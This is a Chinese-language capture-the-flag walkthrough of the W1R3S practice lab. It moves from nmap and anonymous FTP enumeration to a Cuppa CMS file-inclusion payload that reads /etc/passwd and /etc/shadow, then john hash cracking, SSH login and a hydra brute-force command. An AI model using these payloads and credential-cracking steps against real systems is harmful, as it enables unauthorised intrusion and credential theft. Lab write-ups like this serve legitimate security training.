image.png

靶场介绍

靶场描述:

您已被雇用对W1R3S.inc个人服务器进行渗透测试并报告所有发现。他们要求您获得root访问权限并找到标志(位于/root目录中)。
获得低特权外壳的难度:初级/中级
获得权限升级的难度:初级/中级

靶场信息:

信息收集

1.主机发现(ping扫描)

nmap -sn 10.10.10.0/24

image.png1

2.端口探测

nmap -sT -min-rate 10000 -p- 10.10.10.3 -oA 10.10.10.3
参数 使用方法
-sT TCP 扫描 namp -sT 10.10.10.3
-min-rate {发包速率值} 最小的发包速率 namp -sT -min-rate 10000 10.10.10.3
-p- 参数 -p 来指定设置我们将要扫描的端口号,-p-代表全部端口 namp -sT -p- 10.10.10.3,namp -sT -p80,3306 10.10.10.3
-oA {文件名} 可将扫描结果以标准格式、XML格式和Grep格式一次性输出 namp -sT 10.10.10.3 -oA 10.10.10.3

image.png
根据nmap扫描的扫描结果看目标机器开放了21,22,80,3306这4个端口
端口范围缩小再次使用namp开对其进行收集更详细的详细

3.端口信息收集

nmap -sT -sV -sC -O -p21,22,80,3306 10.10.10.3 -oA 10.10.10.3
-sT 获取端口的服务信息
-sV Version 版本检测扫描
-sC 根据端口识别的服务,调用默认脚本
-O 启用操作系统检测,-A来同时启用操作系统检测和版本检测

image.png

1.21端口开放ftp服务可以匿名登入
2.22端口开放Openssh服务版本为7.2p2
3.操作系统是ubuntu
4.80端口开放http服务
5.3306端口开放了数据库mysql的服务

漏洞探测

21 ftp

ftp 10.10.10.3
匿名登录:
	用户名:anonymous 
  密  码:Email或者为空

image.png

# Using binary mode to transfer files-->使用二进制模式传输文件
binary #切换二进制
?		 #查看命令
ls		 #查看文件

image.png

  1. 在ftp中有三个文件,别进入查看都是txt的文本是gte命令全部下载到本地进行分析

image.png

mget *.txt
get worktodo.txt
get employee-names.txt

image.png
image.png
image.png

  1. 分别对ftp下载的txt文件进行查看分析寻找有利信息

    cat *.txt #查看所有的txt文件或者一个一个看

    image.png

  2. New FTP Server For W1R3S.inc(没有获取什么有价值的信息)

image.png

  1. md5解密:This is not a password 翻译过来这不是密码(没有获取什么有价值的信息)

image.png
base64解密(没有获取什么有价值的信息)
image.png

  1. 员工名单可以注意一下,员工名字可能是账号,在遇到登入的时候可以作为爆破字典

image.png

  1. 该文件看样子是倒过过开和反序了image.png使用工具或者截图下来旋转一下

https://www.upsidedowntext.com/
image.png
image.png
没有获取什么有价值的信息

  1. 分析结果总结
    1.user:
    	Naomi
    	Hector
    	Joseph
    	Albert
    	Gina
    	Rico

3306 mysql

21端口没有发现尝试一下3306端口

mysql -h 10.10.10.3 -u root -p

image.png
无法连接

80 http

访问80http搭建的服务
image.png
这是一个apache的默认页面,没有发现可以利用的

目录扫描

dirsearch -u 10.10.10.3

image.png
目录扫描发现有有价值信息
1.http://10.10.10.3/administrator访问后发现这是一个Cuppa CMS框架的安装页面
image.png
2.http://10.10.10.3/javascript访问后报错403
image.png
3.http://localhost/wordpress和http://localhost/wordpress/wp-login.php很明显这是wordpress这是一个博客框架不过无法正常访问尝试需要更改访问,依旧无法访问
image.png
2,3点都无法访问,那重点放到Cuppa CMS框架的安装页面上
使用浏览器对其框架进行历史漏洞搜索或者使用kali中的searchsploit 工具查看是否有历史漏洞
image.png
搜索发现在这个Cuppa CMS框架的安装页面上存在文件包含漏洞

searchsploit搜索

searchsploit cuppa cms
searchsploit cuppa -m 25971.txt
cat 25971.txt

image.png

漏洞利用

根据25971.txt文档利用文件包含漏洞读取文件

/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image.png
无法正常的读取,使用post进行尝试
利用插件hackBar来post发包或者使用burp
image.png
post读取正常可以利用

../../../../../../../../../etc/shadow

image.png
image.png
保存这些有哈希的用户

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

john解哈希

john 10.10.10.3.hash

image.png

user1:w1r3s 
passwd1:computer
user2:www-data
passwd2:www-data
ssh w1r3s@10.10.10.3

登入成功
image.png

提权

sudo -l #显示出自己(执行 sudo 的使用者)的权限

image.png
发现w1r3s用户有root权限,无需提权

flag

cat flag.txt

image.png

扩展

image.png
最后没有利用到22端口,可以利用字典来对22端口进行一个爆破

hydra -L user.txt(用户名字典) -P passwd(密码字典) ssh://10.10.10.3 -t 4

image.png